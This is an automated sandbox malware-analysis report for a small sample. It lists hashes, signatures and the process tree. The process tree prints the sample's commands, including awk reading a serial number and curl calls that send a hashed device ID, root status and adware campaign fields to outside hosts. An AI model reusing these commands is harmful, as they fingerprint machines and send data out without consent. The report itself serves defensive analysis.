Analysis
-
max time kernel
149s -
max time network
146s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240729-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
29-07-2024 07:40
Static task
static1
Behavioral task
behavioral1
Sample
3c6492a33885e363cae2841e0597c730_JaffaCakes118
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
3c6492a33885e363cae2841e0597c730_JaffaCakes118
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
3c6492a33885e363cae2841e0597c730_JaffaCakes118
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
3c6492a33885e363cae2841e0597c730_JaffaCakes118
Resource
debian9-mipsel-20240729-en
General
-
Target
3c6492a33885e363cae2841e0597c730_JaffaCakes118
-
Size
10KB
-
MD5
3c6492a33885e363cae2841e0597c730
-
SHA1
99d5f88fb1a33f321aa614cfe792200bdf9eba5c
-
SHA256
ead1f229097555af8724321021bb8bb5421947e67cd244065dbd2990a6dcdb49
-
SHA512
302bdb0ffb3be9285e7453e04d6067ca03ebdb21af5c0f26e6cb982de1c91631bffb2aab5e2f3a298a54b93337e1b510bee87e3855503a246a130bcc87ce5193
-
SSDEEP
192:g0AjH8A5Zjpcjxi3LKVMyIu8bXkvLvTWM3Tk3Sw3a8na8:g1cA5t8xgNb0/mVLnP
Malware Config
Signatures
-
Reads runtime system information 4 IoCs
Reads data from /proc virtual filesystem.
Processes:
awkcurlmkdircurldescription ioc process File opened for reading /proc/self/maps awk File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/filesystems mkdir File opened for reading /proc/sys/crypto/fips_enabled curl
Processes
-
/tmp/3c6492a33885e363cae2841e0597c730_JaffaCakes118/tmp/3c6492a33885e363cae2841e0597c730_JaffaCakes1181⤵PID:696
-
/usr/bin/touchtouch "/root/Library/Application Support/.upd2029"2⤵PID:698
-
/usr/bin/opensslopenssl md52⤵PID:703
-
/usr/bin/trtr -d "\\n"2⤵PID:702
-
/usr/bin/awkawk "-F\"" "/IOPlatformSerialNumber/{print \$(NF-1)}"2⤵
- Reads runtime system information
PID:701 -
/usr/bin/curlcurl -s -L "http://events.macmymacupdater.com/services/channel/?mid=(stdin)= d41d8cd98f00b204e9800998ecf8427e"2⤵
- Reads runtime system information
PID:708 -
/bin/datedate "+%Y%m%d%H%M%S"2⤵PID:713
-
/bin/mkdirmkdir -p /private/tmp/.mmupdatescripts_202407291059002⤵
- Reads runtime system information
PID:714 -
/usr/bin/curlcurl -s --data-urlencode "event=upd2029start" --data-urlencode "click_id=31006619970322272" --data-urlencode "c3=(stdin)= d41d8cd98f00b204e9800998ecf8427e" --data-urlencode "is_root=true" --data-urlencode "platform_version=" --data-urlencode "safari_version=" --data-urlencode "chrome_version=" --data-urlencode "r4=" --data-urlencode "domain=request.macmymacupdater.com" --data-urlencode "webtools_brand=MyCouponsmart" --data-urlencode "search_domain=www.searchmine.net" --data-urlencode "webtools_channel=upd-2029" --data-urlencode "search_channel=" "http://client.mm-bq.host/AsyncQueueWorkers/trackQueue.php?p=1"2⤵
- Reads runtime system information
PID:715